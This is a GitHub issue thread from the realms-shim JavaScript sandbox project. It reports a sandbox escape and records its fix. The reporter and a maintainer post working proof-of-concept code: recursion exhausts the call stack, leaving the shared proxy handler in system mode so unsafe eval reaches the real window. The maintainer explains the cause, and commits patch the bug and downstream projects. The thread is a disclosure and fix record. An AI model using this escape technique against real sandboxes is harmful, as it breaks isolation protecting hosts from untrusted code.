Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Breakout via RangeError: Maximum call stack size exceeded #48

Closed
XmiliaH opened this issue Sep 14, 2019 · 3 comments · Fixed by #49
Closed

Breakout via RangeError: Maximum call stack size exceeded #48

XmiliaH opened this issue Sep 14, 2019 · 3 comments · Fixed by #49

Comments

@XmiliaH
Copy link

XmiliaH commented Sep 14, 2019
edited
Loading

You can break out of the example via:

function loop(g){
  try{
    g["eval"]('1');
  }catch(e){
    return e;
  }
  return loop(g);
}
loop(this);
const e = eval;
const f = e('Function')
f('return window')().top.document.title = "Oh No"

Tested on Chrome Version 76.0.3809.132 (Official Build) (64-Bit)
@Jack-Works
Copy link
Contributor

Curious why it happened

@jfparadis
Copy link
Contributor

jfparadis commented Sep 14, 2019
edited
Loading

Simplified repro:

function loop(g){
  try{
    g["eval"]('1');
  }catch(e){
    return e;
  }
  return loop(g);
}
loop(this);
(0, eval)('window') + ''

Output should be "undefined" is actually "[object Window]"

@jfparadis
Copy link
Contributor

The cause: the scoped proxy handler is shared between multiple evaluators. When the range error occurs, the state is left in system mode and the unsafe eval is available in user land.

@jfparadis jfparadis mentioned this issue Sep 14, 2019
Merged
jfparadis added a commit that referenced this issue Sep 14, 2019
@jfparadis
Merge pull request #49 from jfparadis/jparadis/master/fix-issue-48
c3b446a 
Fix issue #48 Breakout via RangeError
warner added a commit to Agoric/SES that referenced this issue Sep 15, 2019
@warner
realms-shim: update to newer version
4733cee 
this fixes the sandbox escape described in
Agoric/realms-shim#48
@warner warner mentioned this issue Sep 15, 2019
Merged
warner added a commit to Agoric/SES that referenced this issue Sep 15, 2019
@warner
realms-shim: update to newer version
4e9379c 
this fixes the sandbox escape described in
Agoric/realms-shim#48
warner added a commit to Agoric/SwingSet that referenced this issue Sep 18, 2019
@warner
upgrade to SES v0.6.1
8b402bb 
This fixes a sandbox escape in the realms-shim, described in
Agoric/realms-shim#48
This was referenced Sep 18, 2019
Merged
Closed
jfparadis pushed a commit to endojs/endo that referenced this issue Nov 11, 2019
@warner
realms-shim: update to newer version
7c53819 
this fixes the sandbox escape described in
Agoric/realms-shim#48
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging a pull request may close this issue.

Fix issue #48 Breakout via RangeError jfparadis/realms-shim
3 participants
@jfparadis @Jack-Works @XmiliaH